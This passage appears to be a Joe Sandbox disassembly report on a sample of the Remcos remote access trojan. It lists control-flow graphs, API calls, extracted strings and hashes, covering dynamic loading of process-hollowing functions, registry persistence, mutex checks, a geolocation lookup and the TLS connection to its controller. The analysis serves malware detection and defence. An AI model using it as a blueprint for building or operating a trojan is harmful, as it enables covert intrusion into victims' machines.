                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAD3
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CAD6
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAE8
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CAEB
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAFC
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CAFF
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E92F), ref: 0041CB11
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB14
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E92F), ref: 0041CB20
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB23
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E92F), ref: 0041CB34
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB37
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E92F), ref: 0041CB48
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB4B
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E92F), ref: 0041CB5C
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB5F
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E92F), ref: 0041CB70
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB73
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E92F), ref: 0041CB84
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB87
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E92F), ref: 0041CB98
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB9B
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E92F), ref: 0041CBAC
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CBAF
                                                                                                  • Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E92F), ref: 0041CBC0
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CBC3
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E92F), ref: 0041CBD1
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yaALNupJCH.exe,00000104), ref: 0040E93C
                                                                                                  • Part of subcall function 00410E85: __EH_prolog.LIBCMT ref: 00410E8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\yaALNupJCH.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$C}w$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                • API String ID: 2830904901-1191715453
                                                                                                • Opcode ID: eb7774613e4eb10c5603e39b49e72aca94fdbd87039b9a69dc6e88d4ea3bb132
                                                                                                • Instruction ID: d8e748011ac261579b04b62acd89da4cc948a8ae52a086a136a565020762d1ab
                                                                                                • Opcode Fuzzy Hash: eb7774613e4eb10c5603e39b49e72aca94fdbd87039b9a69dc6e88d4ea3bb132
                                                                                                • Instruction Fuzzy Hash: F932E860B043412BDA14B7729C67B6E26994F81748F50483FB9467B2E3EEBC8D45839E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 448 414e78-414ec0 call 4020df call 41b801 call 4020df call 401e65 call 401fab call 43b9ec 461 414ec2-414ec9 Sleep 448->461 462 414ecf-414f1b call 402093 call 401e65 call 4020f6 call 41bd69 call 40489e call 401e65 call 40b90b 448->462 461->462 477 414f1d-414f8c call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 462->477 478 414f8f-41502a call 402093 call 401e65 call 4020f6 call 41bd69 call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 462->478 477->478 531 41503a-415041 478->531 532 41502c-415038 478->532 533 415046-4150d8 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b43d call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414e37 531->533 532->533 560 415123-415131 call 40482d 533->560 561 4150da-41511e WSAGetLastError call 41ca2f call 4052fd call 402093 call 41b43d call 401fd8 533->561 566 415133-415159 call 402093 * 2 call 41b43d 560->566 567 41515e-415173 call 404f51 call 4048c8 560->567 583 4159f1-415a03 call 404e26 call 4021fa 561->583 566->583 567->583 584 415179-4152cc call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b43d call 401fd8 * 4 call 41b72e call 41450b call 40905c call 441dc1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413646 567->584 597 415a05-415a25 call 401e65 call 401fab call 43b9ec Sleep 583->597 598 415a2b-415a33 call 401e8d 583->598 648 4152e0-415307 call 401fab call 4134f4 584->648 649 4152ce-4152db call 405aa6 584->649 597->598 598->478 655 415309-41530b 648->655 656 41530e-415958 call 40417e call 40dcd7 call 41bb90 call 41bc6c call 41badc call 401e65 GetTickCount call 41badc call 41ba34 call 41badc * 2 call 41b9e4 call 41bc6c * 5 call 40f81f call 41bc6c call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 648->656 649->648 655->656 901 41595d-415964 656->901 902 415966-41596d 901->902 903 415978-41597f 901->903 902->903 904 41596f-415971 902->904 905 415981-415986 call 40af9f 903->905 906 41598b-4159bd call 405a6b call 402093 * 2 call 41b43d 903->906 904->903 905->906 917 4159d1-4159ec call 401fd8 * 2 call 401f09 906->917 918 4159bf-4159ca 906->918 917->583 918->917
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414EC9
                                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004150DA
                                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415A25
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                • String ID: | $%I64u$4.9.2 Pro$8SG$C:\Users\user\Desktop\yaALNupJCH.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$C}w$NG$NG$PG$PG$PG
                                                                                                • API String ID: 524882891-113149829
                                                                                                • Opcode ID: afd943ef5dcc4cc756cdb076416e71ead7d8f035da6ea20701237ae6b59bc3e5
                                                                                                • Instruction ID: 0c0af6725c2ee72569da9b24d69e1a2afa1e62434ece525c72468294da20a235
                                                                                                • Opcode Fuzzy Hash: afd943ef5dcc4cc756cdb076416e71ead7d8f035da6ea20701237ae6b59bc3e5
                                                                                                • Instruction Fuzzy Hash: 22527B31A001155ACB18F732DD96AFEB3759F90348F5041BFE40A761E2EF781E858A9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: ab4cb6909e3c6c2de8a63f62b80cba0d09a48fc96966410bdc9691a4cb57bb68
                                                                                                • Instruction ID: 1d1f4e3e38f99df0ccdd24eaac06efc89d62f3200a1196d06f059074cb1d02c7
                                                                                                • Opcode Fuzzy Hash: ab4cb6909e3c6c2de8a63f62b80cba0d09a48fc96966410bdc9691a4cb57bb68
                                                                                                • Instruction Fuzzy Hash: 104107B47407116BC61477BA8D1B52E7A55AB81308B90017FE60266AD3EA79AC108BEF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1000 40d982-40d9a7 call 401f86 1003 40dad1-40daf7 call 401f04 GetLongPathNameW call 40417e 1000->1003 1004 40d9ad 1000->1004 1027 40dafc-40db69 call 40417e call 40dd1f call 402fa5 * 2 call 401f09 * 5 1003->1027 1006 40d9f3-40d9fa call 41bf05 1004->1006 1007 40d9b4-40d9b9 1004->1007 1008 40daa6-40daab 1004->1008 1009 40d9e9-40d9ee 1004->1009 1010 40dabc 1004->1010 1011 40daad-40dab2 call 43c00f 1004->1011 1012 40d9be-40d9cc call 41b502 call 401f13 1004->1012 1013 40d9df-40d9e4 1004->1013 1014 40da9f-40daa4 1004->1014 1028 40d9fc-40da4c call 40417e call 43c00f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1006->1028 1029 40da4e-40da9a call 40417e call 43c00f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1006->1029 1016 40dac1-40dac6 call 43c00f 1007->1016 1008->1016 1009->1016 1010->1016 1024 40dab7-40daba 1011->1024 1031 40d9d1 1012->1031 1013->1016 1014->1016 1030 40dac7-40dacc call 409057 1016->1030 1024->1010 1024->1030 1036 40d9d5-40d9da call 401f09 1028->1036 1029->1031 1030->1003 1031->1036 1036->1003
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DAE8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: 08152344a88b1aafa287ee53882f99d057b338c833188ad934ba85c4ac9216bd
                                                                                                • Instruction ID: 145e99ee69a128d844c50a4e5757f73a1ea156b369d54702e3bea958445c7b3d
                                                                                                • Opcode Fuzzy Hash: 08152344a88b1aafa287ee53882f99d057b338c833188ad934ba85c4ac9216bd
                                                                                                • Instruction Fuzzy Hash: 324142716082019AC215FB61DC56CAFB3A8AED075CF10053FB146B20E2FF789D49C65B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B2F5
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B30B
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B324
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B36A
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B36D
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041B305
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: 76ad1f6297f49dd75f66eda75dc814347f90daedd7df2bf0f6010fd8ef171b9d
                                                                                                • Instruction ID: 51d5d9e6badc34deb6fc5e13cd0461c56716845dbac29438bce231469f2039f8
                                                                                                • Opcode Fuzzy Hash: 76ad1f6297f49dd75f66eda75dc814347f90daedd7df2bf0f6010fd8ef171b9d
                                                                                                • Instruction Fuzzy Hash: 221108311053126BD224AB269C89EBF7F9CEF86355F00043EF945A2281DB68DC45C6F6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1100 41b211-41b268 call 41bf05 call 4134f4 call 401fe2 call 401fd8 call 406ae1 1111 41b2ab-41b2b4 1100->1111 1112 41b26a-41b279 call 4134f4 1100->1112 1114 41b2b6-41b2bb 1111->1114 1115 41b2bd 1111->1115 1116 41b27e-41b295 call 401fab StrToIntA 1112->1116 1117 41b2c2-41b2cd call 40537d 1114->1117 1115->1117 1122 41b2a3-41b2a6 call 401fd8 1116->1122 1123 41b297-41b2a0 call 41ceb7 1116->1123 1122->1111 1123->1122
                                                                                                APIs
                                                                                                  • Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16
                                                                                                  • Part of subcall function 004134F4: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
                                                                                                  • Part of subcall function 004134F4: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413535
                                                                                                  • Part of subcall function 004134F4: RegCloseKey.KERNEL32(?), ref: 00413540
                                                                                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B28A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1866151309-2070987746
                                                                                                • Opcode ID: b70d67bc590ebc8f5d6323d6fa3e34c4297352d767c7317703301afde455c94f
                                                                                                • Instruction ID: 85ec155db325c3716f7be7651620dee3a3d5c829a50febba6db02ef006b91dd8
                                                                                                • Opcode Fuzzy Hash: b70d67bc590ebc8f5d6323d6fa3e34c4297352d767c7317703301afde455c94f
                                                                                                • Instruction Fuzzy Hash: 4D11E770A4010516C704B36A8C9BEFF76598B51304F54053BF546B21D2FB7C5D8683EE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                                • FindCloseChangeNotification.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                                                • String ID: C}w
                                                                                                • API String ID: 2579639479-225694155
                                                                                                • Opcode ID: 0f902c50f68177a48589da84d99d87b9834b108c6d20614da67969fb47c64140
                                                                                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                                                • Opcode Fuzzy Hash: 0f902c50f68177a48589da84d99d87b9834b108c6d20614da67969fb47c64140
                                                                                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1223 404f51-404f5f 1224 404f65-404f6c 1223->1224 1225 404fea 1223->1225 1226 404f74-404f7b 1224->1226 1227 404f6e-404f72 1224->1227 1228 404fec-404ff1 1225->1228 1229 404fc0-404fdd CreateEventA 1226->1229 1230 404f7d-404fbb GetLocalTime call 41badc call 4052fd call 402093 call 41b43d call 401fd8 1226->1230 1227->1229 1233 404fe6-404fe8 1229->1233 1230->1229 1233->1228
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415C24,?,00000001), ref: 00404F81
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415C24,?,00000001), ref: 00404FCD
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout: $C}w
                                                                                                • API String ID: 2532271599-1405593962
                                                                                                • Opcode ID: 082ae36f3936cb6e40208b16190b89ec08c6e4c5d4be21b07eeb4c36054df58b
                                                                                                • Instruction ID: 3be0fb6296c169822b6bfad2b003431a84525fea4849727fdd8bc91c5f69ea92
                                                                                                • Opcode Fuzzy Hash: 082ae36f3936cb6e40208b16190b89ec08c6e4c5d4be21b07eeb4c36054df58b
                                                                                                • Instruction Fuzzy Hash: 79110671800385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1241 44f29b-44f2b0 GetEnvironmentStringsW 1242 44f2b2-44f2d2 call 44f264 WideCharToMultiByte 1241->1242 1243 44f308 1241->1243 1242->1243 1249 44f2d4-44f2d5 call 446077 1242->1249 1245 44f30a-44f30c 1243->1245 1246 44f315-44f31d 1245->1246 1247 44f30e-44f30f FreeEnvironmentStringsW 1245->1247 1247->1246 1251 44f2da-44f2df 1249->1251 1252 44f2e1-44f2f5 WideCharToMultiByte 1251->1252 1253 44f2fd 1251->1253 1252->1253 1254 44f2f7-44f2fb 1252->1254 1255 44f2ff-44f306 call 446642 1253->1255 1254->1255 1255->1245
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F2A4
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F2C7
                                                                                                  • Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F2ED
                                                                                                • _free.LIBCMT ref: 0044F300
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F30F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 0188c23d9a42ca701e810b9320793c8bfeb8bdf58a3de3564db1771293670913
                                                                                                • Instruction ID: 6f93c96cac939cab9531f5e5a2489491171a956b12200d0629ea11f0b50ef7ae
                                                                                                • Opcode Fuzzy Hash: 0188c23d9a42ca701e810b9320793c8bfeb8bdf58a3de3564db1771293670913
                                                                                                • Instruction Fuzzy Hash: 6001D472601711BF77211ABA5C8CC7F6A6CEAC6FA6325013BFC04C2205DA698C0591B9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1258 448159-448170 GetLastError 1259 448172-44817c call 44867c 1258->1259 1260 44817e-448185 call 445a33 1258->1260 1259->1260 1265 4481cf-4481d6 SetLastError 1259->1265 1264 44818a-448190 1260->1264 1266 448192 1264->1266 1267 44819b-4481a9 call 4486d2 1264->1267 1268 4481d8-4481dd 1265->1268 1269 448193-448199 call 446642 1266->1269 1274 4481ae-4481c4 call 447f47 call 446642 1267->1274 1275 4481ab-4481ac 1267->1275 1276 4481c6-4481cd SetLastError 1269->1276 1274->1265 1274->1276 1275->1269 1276->1268
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BBC7,00000000,00000000,?,0043BC4B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044815E
                                                                                                • _free.LIBCMT ref: 00448193
                                                                                                • _free.LIBCMT ref: 004481BA
                                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 004481C7
                                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 004481D0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 73148e45db194749aa813c8d1e9651f1292055391ac483a56b3624eb5748bc14
                                                                                                • Instruction ID: 0b380766fe1817187751ec2fb0ad1f4860a95c254106f4947c3de2dc19a13ac7
                                                                                                • Opcode Fuzzy Hash: 73148e45db194749aa813c8d1e9651f1292055391ac483a56b3624eb5748bc14
                                                                                                • Instruction Fuzzy Hash: F301D1361447006BB612272A6C86A6F316D9BD2775B32052FF909A22A2EE6CCC03816D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
                                                                                                • String ID: !D@$NG
                                                                                                • API String ID: 180926312-2721294649
                                                                                                • Opcode ID: a0b38f98c671beb7fc3d87e18fa3f1af28177e2fab2b91f248755b924d0bc7a1
                                                                                                • Instruction ID: 4664a4f16019f4c21568267905f705ac892616566a68641603d99fb648fe5e11
                                                                                                • Opcode Fuzzy Hash: a0b38f98c671beb7fc3d87e18fa3f1af28177e2fab2b91f248755b924d0bc7a1
                                                                                                • Instruction Fuzzy Hash: 2A51B6715082419AC724FB32D852AFF73A5AF90344F50483FF546671E2EF7C5946C68A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1372 4136bd-4136d4 RegCreateKeyA 1373 4136d6-41370b call 40247c call 401fab RegSetValueExA RegCloseKey 1372->1373 1374 41370d 1372->1374 1376 41370f-41371d call 401fd8 1373->1376 1374->1376
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004136CC
                                                                                                • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136F4
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1818849710-4028850238
                                                                                                • Opcode ID: 87a8587fdf61455578c18fadf820c0f2941d90eae7f8086bdc4bef892f8b9eae
                                                                                                • Instruction ID: cc028357d89538f4ae3fadff7a052b61de77b90b6085a72f54274e8bffa45260
                                                                                                • Opcode Fuzzy Hash: 87a8587fdf61455578c18fadf820c0f2941d90eae7f8086bdc4bef892f8b9eae
                                                                                                • Instruction Fuzzy Hash: 51F06272400218FBCB009FA1DC45DEE3B6CEF05751F108566FD09A61A1D7359E14DA94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1382 40cfb7-40cfe3 call 401fab CreateMutexA GetLastError
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EB56,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040CFC6
                                                                                                • GetLastError.KERNEL32 ref: 0040CFD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutex
